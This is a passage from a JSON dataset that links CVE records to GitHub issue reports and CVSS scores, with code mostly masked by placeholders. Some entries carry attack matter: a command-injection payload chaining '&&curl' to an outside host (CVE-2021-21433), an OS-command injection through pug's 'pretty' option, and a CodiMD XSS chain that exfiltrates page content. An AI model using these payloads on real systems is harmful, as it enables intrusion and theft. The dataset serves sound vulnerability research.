Antonio Morales APITAG Security Lab Team",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-9273",
        "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/903",
        "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/903",
        "Repo_new": "proftpd/proftpd",
        "Issue_Created_At": "2020-02-18T17:27:21Z",
        "description": "Use after free vulnerability in memory pool allocator. This vulnerability was previously reported via email to EMAILTAG rg and has been made public after the fix has been developed. Credit This issue was discovered and reported by APITAG Security Lab team member MENTIONTAG APITAG Morales). Summary A use after free vulnerability exists in APITAG Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system. Product APITAG Tested Version APITAG (development version) Details Use after free vulnerability in memory pool allocator It is possible to corrupt the APITAG memory pool by interrupting current data transfer APITAG Exploit Demo APITAG In our APITAG the program crashes on \"alloc_pool\" function (pool.c). This function executes the instruction first_avail = blok >h.first_avail. As you can see, the right side operand of the assignment in APITAG is p >last APITAG However, the problem is that \"p\" is a corrupted pool APITAG The source of the problem comes from pcalloc call in APITAG APITAG This function calls again to the \"alloc_pool\" function which calls to \"new_block\" to obtain a new freed memory block APITAG But the memory block returned by \"new_block\" is referenced by the \"p\" pool. So, in short, \"p\" is a dangling pointer due to an use after free vulnerability. It's important to note that our tests have shown that this vulnerability can also lead to other vulnerabilities (such as OOB write), so it increases the severity of the vulnerability. Impact This issue may lead to Post Auth RCE (maybe FTP anonymous users are also affected). Disclosure Policy This report is subject to a NUMBERTAG day coordinated disclosure policy. The disclosure deadline for the findings outlined in this report is NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-9329",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/5926",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/5926",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2020-02-19T18:09:37Z",
        "description": "Race condition can make APITAG useless. Description Users could potentially create more repos than specified in APITAG as APITAG field is not updated in a race condition safe cavalier (i.e. row is not locked). Such logic error could be fatal in some specific settings. Reason PATHTAG ERRORTAG APITAG Execute following script in the console of the user: CODETAG The resultant APITAG is less than NUMBERTAG it is NUMBERTAG in my settings) though NUMBERTAG repos are created. Solution Indeed, some other fields also need locking but are not that crucial to the integrity of the system. CODETAG Or stop using fields in user table to save the value as it could be counted directly by using repository table.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-9369",
        "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/886",
        "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/886",
        "Repo_new": "sympa-community/sympa",
        "Issue_Created_At": "2020-02-24T04:26:11Z",
        "description": "FILETAG (published later). Pull request has been prepared and will be submitted soon.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-9447",
        "Issue_Url_old": "https://github.com/manolo/gwtupload/issues/32",
        "Issue_Url_new": "https://github.com/manolo/gwtupload/issues/32",
        "Repo_new": "manolo/gwtupload",
        "Issue_Created_At": "2020-02-12T17:14:35Z",
        "description": "XSS in the file upload functionality. There is an APITAG site scripting) present in the file upload functionality, where someone can upload a file with malicious filename, which contains APITAG code, which would results in XSS. Example: FILETAG FILETAG How to reproduce NUMBERTAG Deploy APITAG war file ( FILETAG NUMBERTAG Upload a file from a Linux system(due to Windows filename character restrictions), which contains APITAG code. For example: a APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-9465",
        "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/51",
        "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/51",
        "Repo_new": "eyesofnetworkcommunity/eonweb",
        "Issue_Created_At": "2020-02-26T17:32:06Z",
        "description": "Injection SQL sur le cookie user_id. Bonjour, Il est possible de r\u00e9aliser une injection SQL sur le cookie APITAG . Il a \u00e9t\u00e9 observ\u00e9 que cette injection est possible sur les pages APITAG , APITAG et APITAG sans authentification pr\u00e9alable. Exemple d'injection de code utilisant la fonction sleep NUMBERTAG ERRORTAG L'exploitation d'une telle injection SQL peut permettre \u00e0 un attaquant d'obtenir des acc\u00e8s administrateurs sur l'application (r\u00e9cup\u00e9ration de session_id admin, dump de table users). Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG et NUMBERTAG t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel (la NUMBERTAG doit probablement aussi \u00eatre vuln\u00e9rable). Le fichier source permettant l\u2019injection SQL est APITAG au morceau de code suivant : CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-9467",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1168",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1168",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2020-03-24T13:03:01Z",
        "description": "stored XSS with APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-9468",
        "Issue_Url_old": "https://github.com/plegall/Piwigo-community/issues/49",
        "Issue_Url_new": "https://github.com/plegall/piwigo-community/issues/49",
        "Repo_new": "plegall/piwigo-community",
        "Issue_Created_At": "2020-03-24T13:19:57Z",
        "description": "[security] ability to by pass protection on photo edition. CVETAG reported by Zak S. > Further, a malicious user can modify the value of the 'image_id' parameter to any existing image id. There are no access controls to prevent a user from manipulating information on images that are in albums to which they do not have access.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-9546",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2631",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2631",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-02-27T21:17:02Z",
        "description": "Block one more gadget type (shaded hikari config, CVE to be allocated) . (note: placeholder until verified/validated, fix provided) Another gadget type reported regarding a class of [TO BE ADDED]. See URLTAG for description of the general problem. Mitre id: [TO BE ALLOCATED] Reporters: threedr3am & LFY Fix will be included in:",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-9547",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2634",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2634",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-03-01T01:02:31Z",
        "description": "Block two more gadget types (ibatis sqlmap, anteros core; CVE to be allocated). note: placeholder until verified/validated, fix provided) Another NUMBERTAG gadget type reported regarding a classes of [TO BE ADDED]. See URLTAG for description of the general problem. Mitre id: [TO BE ALLOCATED] Reporters: threedr3am & APITAG Fix will be included in:",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-9549",
        "Issue_Url_old": "https://github.com/enferex/pdfresurrect/issues/8",
        "Issue_Url_new": "https://github.com/enferex/pdfresurrect/issues/8",
        "Repo_new": "enferex/pdfresurrect",
        "Issue_Created_At": "2020-02-28T18:57:24Z",
        "description": "Bug: Buffer Overflow into Out of Bounds Write. Description In NUMBERTAG and newer, the function APITAG in APITAG has the following logic: URLTAG If buf does not contain one of the expected terminating characters (whitespace, APITAG , APITAG ), c can point to an address outside buf , causing a APITAG byte to be written out of bounds. Example Instead of creating a APITAG I found a benign PDF that happens to trigger this bug: FILETAG (sha NUMBERTAG APITAG ) The problem occurs while parsing the following data: CODETAG Due to the reuse of buf between invocations of the function, buf will eventually contain: APITAG This benign example causes a read to segfault, but a more carefully crafted input could cause an out of bounds write. Valgrind ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-20066",
        "Issue_Url_old": "https://github.com/jsdom/jsdom/issues/3124",
        "Issue_Url_new": "https://github.com/jsdom/jsdom/issues/3124",
        "Repo_new": "jsdom/jsdom",
        "Issue_Created_At": "2021-02-22T09:43:06Z",
        "description": "CVETAG ] : APITAG improperly allows the loading of local resources. Basic info: FILETAG version NUMBERTAG jsdom version NUMBERTAG Minimal reproduction case From URLTAG _([ CVETAG CVETAG _ : > Synopsis > > APITAG improperly allows the loading of local resources. Modern browser best practices dictate that the loading of local resources should be disallowed by default. > > From documentation, APITAG does not, by default, load any subresources. Users must enable the loading of resources/subresources. For example, when creating a new JSDOM object, the resources item can be set to \"usable\" to allow the loading of external resources: APITAG > The issue here is that this setting also enables the loading of local resources. For example, the following code snippet verifies that JSDOM is attempting to access a local resource by using a non existent file to throw an error: CODETAG > Output when running the above: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.6,
        "impactScore": 3.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-20190",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2854",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2854",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-09-16T15:32:43Z",
        "description": "Block one more gadget type APITAG Another gadget type(s) has been reported but not yet verified regarding a class(es) of JDK Swing. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): Yangkun(ICSL) Fix (if one needed) would be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-20218",
        "Issue_Url_old": "https://github.com/fabric8io/kubernetes-client/issues/2715",
        "Issue_Url_new": "https://github.com/fabric8io/kubernetes-client/issues/2715",
        "Repo_new": "fabric8io/kubernetes-client",
        "Issue_Created_At": "2021-01-12T04:35:34Z",
        "description": "Potential CVE?. A recently found vulnerability URLTAG was fixed in another project URLTAG similar to this one. It might potentially affect a similar implementation URLTAG in APITAG . Ironically, it prints out the normalized path URLTAG into stdout, but uses the original (potentially dangerous) path.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-20245",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/3176",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/3176",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2021-02-02T06:03:44Z",
        "description": "Division by zero in APITAG in coders/webp.c . When APITAG was set to zero, a division by zero error would happen in line NUMBERTAG So a crafted file may trigger undefined behavior in the form of division by zero. Maybe there need a APITAG to do division in line NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-20285",
        "Issue_Url_old": "https://github.com/upx/upx/issues/421",
        "Issue_Url_new": "https://github.com/upx/upx/issues/421",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2020-11-12T12:39:35Z",
        "description": "APITAG APITAG APITAG What's the problem (or question)? An issue was discovered in up NUMBERTAG devel branch), There is an illegal memory access in function APITAG at APITAG I also check the newest release version meet the same crash, lies at APITAG What should have happened? no illegal memory access (crash) Do you have an idea for a solution? check the relocation_offset and do not access the illegal memory How can we reproduce the issue NUMBERTAG Compile the devel branch with sanitize open APITAG NUMBERTAG Use APITAG and get crash download the poc URLTAG here. source ERRORTAG the source code didn't check the rel_off so get an illegal rp debug FILETAG bug report ERRORTAG Please tell us details about your environment. UPX version used (both APITAG and APITAG ): Host Operating System and version: ubuntu NUMBERTAG Host CPU architecture: Intel(R) Core(TM) i NUMBERTAG H CPU NUMBERTAG GHz Target Operating System and version: ubuntu NUMBERTAG Target CPU architecture: Intel(R) Core(TM) i NUMBERTAG H CPU NUMBERTAG GHz",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.6,
        "impactScore": 4.7,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-20308",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/423",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/423",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-03-21T13:11:39Z",
        "description": "Bug: buffer overflow caused by integer overflow in APITAG Hi, I found some integer overflow vulnerability that is similar to CVETAG URLTAG in htmldoc. os : Debian APITAG bullseye/sid version NUMBERTAG FILETAG In htmldoc poc, there are maliciously crafted gif and html file which crashes htmldoc like below. APITAG The vulnerability resides in APITAG function in htmldoc/image.cxx file. In line NUMBERTAG the program reads data from given gif file using fread NUMBERTAG fread(buf NUMBERTAG fp); Then, it stores value to 'img >width' and 'img >height' in line NUMBERTAG and 'img >depth' is determined by whether given image is grayscale NUMBERTAG img >width = (buf NUMBERTAG APITAG height = (buf NUMBERTAG APITAG depth = gray NUMBERTAG If load_data is equal to NUMBERTAG and, 'img >width' and 'img >height' are enough large to cause an integer overflow, the small heap block is allocated in line NUMBERTAG It leads to buffer overrun when reads data to this buffer in APITAG NUMBERTAG if (!load_data NUMBERTAG return NUMBERTAG img >pixels = (uchar )malloc((size_t)(img >width img >height img >depth));",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-21259",
        "Issue_Url_old": "https://github.com/hackmdio/codimd/issues/1648",
        "Issue_Url_new": "https://github.com/hackmdio/codimd/issues/1648",
        "Repo_new": "hackmdio/codimd",
        "Issue_Created_At": "2021-01-13T11:01:12Z",
        "description": "Stored XSS in slide mode (via reveal markdown). There is a (quite convoluted) stored XSS vulnerability in the slides feature: The presentation's YAML options allow specifying APITAG files as dependencies. Any JS file specified by the dependency option is loaded and executed (when viewed via the presentation mode, APITAG ), subject to the server's CSP and their Content Type header We can use JSONP endpoints that bypass the CSP (e.g. on Vimeo or Slideshare, or on Disqus with a free API key) to run arbitrary existing JS functions _without arguments_ We use APITAG followed by APITAG to inject HTML from a div element with a APITAG attribute in the speaker notes into the DOM. The slide navigation is necessary to ensure that the speaker notes are outside of the DOM of the original slide before the second request comes in (duplicate calls to APITAG break the proof of concept). Usually, the included markdown would be enclosed in a APITAG tag to ensure that nothing can escape into the DOM. However, APITAG does not properly escape APITAG tags (the check is case sensitive, but should at the very least be case insensitive): CODETAG Actual JS in this DOM injection will never be loaded, because it is assigned via APITAG , but because the CSP includes so many different embed features, we can load FILETAG from Disqus (it is used on the Disqus login page, fairly easy to find) that walks the entire DOM and renders APITAG template strings. From the template, we can simply grab another script from anywhere (including another note) and eval it. A full proof of concept implementation can be found here URLTAG : The main note ( APITAG ) is responsible for loading the templating JS (and the old APITAG version that it requires) from Disqus, and issuing the two JSONP calls that lead to the DOM injection The APITAG note contains the content that is injected into the DOM, and loads and executes the final payload The APITAG script is the final XSS payload (here, because this was for hxp NUMBERTAG CTF's hackme challenge URLTAG it simply grabs the contents of the APITAG page and sends it to the attacker, but you can just as easily run any other APITAG code). The APITAG script automates the upload process and automatically reports the XSS page (the slides of APITAG in presentation mode) to the challenge admin, which isn't really relevant here. The most straightforward way to mitigate this is to fix the DOM injection in APITAG by modifying the check for APITAG to cover everything that browsers use to end a APITAG tag. I also wonder what value the dependency YAML option really brings to the slides feature it is restricted to loading JS from pages listed in the CSP anyways, so it would probably be better to just load scripts related to e.g. video embeds as needed (just as in \"normal\" markdown mode), and discard the option otherwise. Note that while the CTF challenge was using a (slightly modified, to fix some but given some of the solutions, apparently not all dependencies with known CVEs) APITAG NUMBERTAG this exploit still works against the official NUMBERTAG release, and FILETAG ( source URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-21306",
        "Issue_Url_old": "https://github.com/markedjs/marked/issues/1927",
        "Issue_Url_new": "https://github.com/markedjs/marked/issues/1927",
        "Repo_new": "markedjs/marked",
        "Issue_Created_At": "2021-02-05T01:36:23Z",
        "description": "Groups of consecutive underscores in a specific pattern hang/take a long time to convert. Marked version NUMBERTAG Describe the bug NUMBERTAG or more groups of odd and even numbered consecutive underscores followed by a character takes a very long time to convert. Example input: APITAG If you click on the Marked Demo link below, you will see that this takes a long time to convert (approximately NUMBERTAG minutes). The input above is NUMBERTAG underscores NUMBERTAG underscores NUMBERTAG underscores, and an a . Modifying the input in a number of ways changes the conversion time to APITAG NUMBERTAG FILETAG NUMBERTAG APITAG Demo URLTAG Expected behavior The markdown to html conversion should take roughly the same amount of time as it does as when the above example input is modified such in one of the ways describe above (i.e NUMBERTAG ms).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-21323",
        "Issue_Url_old": "https://github.com/brave/brave-browser/issues/13527",
        "Issue_Url_new": "https://github.com/brave/brave-browser/issues/13527",
        "Repo_new": "brave/brave-browser",
        "Issue_Created_At": "2021-01-12T23:53:28Z",
        "description": "[hackerone] Tor DNS issue. URLTAG related NUMBERTAG it appears this was a known issue at least in the muon days. unclear if it was ever fixed in brave core. URLTAG suggests that DNS prefetching may be the only source of this leak, and supposedly this can be disabled via the 'preload pages' setting in PATHTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-21353",
        "Issue_Url_old": "https://github.com/pugjs/pug/issues/3312",
        "Issue_Url_new": "https://github.com/pugjs/pug/issues/3312",
        "Repo_new": "pugjs/pug",
        "Issue_Created_At": "2021-02-10T06:17:12Z",
        "description": "Code injection vulnerability in APITAG and APITAG through \"pretty\" option. Hello, I found that pug may allow an attacker to inject arbitrary javascript code if an attacker can control APITAG . Pug Version NUMBERTAG Proof of concept Here is an vulnerable example including NUMBERTAG files: FILETAG and index.pug . In the example, there is only one variable \"pretty\" that is controlled by user, and the variable is not used in any dangerous functions. FILETAG ERRORTAG views/index.pug APITAG But if we visit URL below, it would lead to execute OS command \"whoami\". APITAG Detail This section will point the location of vulnerability and explain why I assume it's an issue. First of all, when Compiler object is initialized, APITAG would be saved in APITAG . URLTAG The APITAG function is simple, APITAG is pushed into APITAG array which stores the compiled code of template without any sanitization. APITAG URLTAG The APITAG is basically same as APITAG , APITAG is pushed without any sanitization at line NUMBERTAG APITAG : URLTAG If we look at how other functions handle options variables, we can see that they are all sanitized by stringify. ( APITAG is implemented with APITAG and APITAG always sanitizes variable with stringify. ) with APITAG : URLTAG with APITAG : URLTAG with stringify : URLTAG APITAG The APITAG and APITAG are the only two functions I found that are missing sanitization. I think it may be an issue.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-21361",
        "Issue_Url_old": "https://github.com/bmuschko/gradle-vagrant-plugin/issues/19",
        "Issue_Url_new": "https://github.com/bmuschko/gradle-vagrant-plugin/issues/19",
        "Repo_new": "bmuschko/gradle-vagrant-plugin",
        "Issue_Created_At": "2021-02-15T18:01:12Z",
        "description": "Potential credentials leak when setting APITAG Problem Currently if APITAG is set, this will cause the whole environment from the Gradle process URLTAG to be inherited to the vagrant command. This is then printed on info level to the console log URLTAG . Context A common pattern for injecting credentials into the build process on build servers is to set them as environment variables on the build tool process. This way e.g. the credentials for deploying to maven central can be passed the Gradle tasks that need them. So when my build executes a Vagrant task that has some environment variables set and also has reads some credentials from the environment, this may leak the credentials to build scans and the build server log. Options Remove envp from console output. log on debug level this will prevent the output to show up in build scans. It will not prevent the output to end up in build server logs, if Gradle is configured to log on debug level. Add a verbose configuration flag to control whether or not the command and environment should be printed to the log. It should default to false .",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-21401",
        "Issue_Url_old": "https://github.com/nanopb/nanopb/issues/647",
        "Issue_Url_new": "https://github.com/nanopb/nanopb/issues/647",
        "Repo_new": "nanopb/nanopb",
        "Issue_Created_At": "2021-03-20T00:14:28Z",
        "description": "Ill formed oneof message leads to calling free on an arbitrary pointer. This affects APITAG (and probably lower versions, though I haven't checked) with APITAG enabled. Specially crafted bytes can make APITAG eventually call APITAG on an arbitrary pointer. Here's the smallest repro case I could make: ERRORTAG Running this leads to: ERRORTAG I can repro this on both Linux and Mac. What I believe happens is: the first two bytes are interpreted as APITAG and result in APITAG URLTAG being set to APITAG URLTAG ; the third byte is interpreted as a field tag referring to APITAG . Because there are no more bytes in the input, decoding the field fails (with APITAG ). However, the current field is reset to APITAG from APITAG while APITAG is not cleared and is still set to APITAG ; seeing that decoding failed, APITAG tries to release the message. APITAG , thinking that the current field is APITAG , considers the contents of APITAG to refer to a dynamically allocated array and calls APITAG on it URLTAG . I'm not sure what the right fix would be perhaps APITAG should be set to null when oneof fields are switched, or perhaps the current field should not be changed until it is successfully parsed? Note that this is a potential security issue. I presume that if the first field was an integer, an arbitrary value could be written to it which would then be interpreted as an address and passed to free . Note: this was found by OSS Fuzz on Firestore (note that I have trimmed down the repro case from the original).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-21417",
        "Issue_Url_old": "https://github.com/FluidSynth/fluidsynth/issues/808",
        "Issue_Url_new": "https://github.com/fluidsynth/fluidsynth/issues/808",
        "Repo_new": "fluidsynth/fluidsynth",
        "Issue_Created_At": "2021-03-14T06:33:16Z",
        "description": "fluidsynth crashes when loading malformed sf2 file. version: APITAG APITAG APITAG .... URLTAG It says APITAG is the last gen, and then set level to NUMBERTAG and break. CODETAG but if a malformed sf2 doesn't contain APITAG it will finally goto here: URLTAG CODETAG it will be freed again at: URLTAG APITAG APITAG > APITAG > APITAG > APITAG > APITAG > APITAG Here is an example that trigger this vuln. FILETAG FILETAG FILETAG Programs like VLC that use this library are affected by this vulnerability: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-21422",
        "Issue_Url_old": "https://github.com/mongo-express/mongo-express/issues/577",
        "Issue_Url_new": "https://github.com/mongo-express/mongo-express/issues/577",
        "Repo_new": "mongo-express/mongo-express",
        "Issue_Created_At": "2020-05-30T09:14:49Z",
        "description": "HTML in String fields is not escaped. Version: docker image latest (as of NUMBERTAG Docker Image mongo APITAG I use a APITAG collection to save HTML Dokuments in a string property of documents and use mongo express to access the Mongo Database. Especially when the properties with the HTML content are not loaded directly because of their size and I click on APITAG the HTML content is loaded and rendered by the browser. If you need further information please feel free to ask I'll try to answer as fast as possible. Here are some Screenshots from my browser: The Screenshots are from the complete page so they are really long but I think they demonstrate the Problem quite well. Normal View: FILETAG Opened a first HTML content attribute by clickin on APITAG Property\": FILETAG Opened a second HTML content attribute FILETAG Opened multiple HTML content attirbutes: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-21433",
        "Issue_Url_old": "https://github.com/DEMON1A/Discord-Recon/issues/6",
        "Issue_Url_new": "https://github.com/demon1a/discord-recon/issues/6",
        "Repo_new": "demon1a/discord-recon",
        "Issue_Created_At": "2021-02-25T10:26:02Z",
        "description": "Blind RCE \u0641\u0633\u064a\u0631\u0641\u0631\u0643 \u064a\u0627 \u0628\u064a\u0629. \u0639\u0634\u0627\u0646 \u0627\u0646\u062a\u0627 \u0627\u062e\u0648\u064a\u0627 \u0636\u064a\u0641 \u0627\u0644\u0631\u0627\u062c\u0644 \u0627\u0644\u062c\u062f\u0639 \u0645\u062d\u0628\u062a\u0634 \u0627\u0647\u0646\u0643\u0631\u0643 .dirsearch anything&&curl FILETAG .anytool anything&&curl FILETAG APITAG Kind Regards, APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-21979",
        "Issue_Url_old": "https://github.com/bitnami/bitnami-docker-laravel/issues/139",
        "Issue_Url_new": "https://github.com/bitnami/bitnami-docker-laravel/issues/139",
        "Repo_new": "bitnami/bitnami-docker-laravel",
        "Issue_Created_At": "2021-03-02T19:09:25Z",
        "description": "Laravel APP_KEY is fixed in docker image bitnami/laravel. Description The file PATHTAG is generated at the time that the docker image bitnami/laravel was built, and the value of APP_KEY is fixed under certain conditions. Although the APP_KEY will generated randomly each time we install laravel: APITAG But if we build it as a docker image, the APP_KEY is a fixed value whenever we run it. This value is crucial for the security of the application and must be randomly generated per Laravel installation. An attacker would be able to perform a deserialization attack, for instance using a Laravel vulnerability CVETAG URLTAG . If your application's encryption key is in the hands of a malicious party, that party could craft cookie values using the encryption key and exploit vulnerabilities inherent to PHP object serialization / unserialization, such as calling arbitrary class methods within your application. Fix The Entrypoint now regenerates the APP_KEY if the app is not mounted and copied from the default one. This issue was reported by LEI WANG URLTAG on February the NUMBERTAG rd and it was fixed on Feburary the NUMBERTAG th. The following container images have been released with the fi NUMBERTAG debian NUMBERTAG r NUMBERTAG or newer NUMBERTAG debian NUMBERTAG r NUMBERTAG or newer NUMBERTAG debian NUMBERTAG r0 or newer",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 3.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-22563",
        "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/735",
        "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/735",
        "Repo_new": "libjxl/libjxl",
        "Issue_Created_At": "2021-10-14T20:01:32Z",
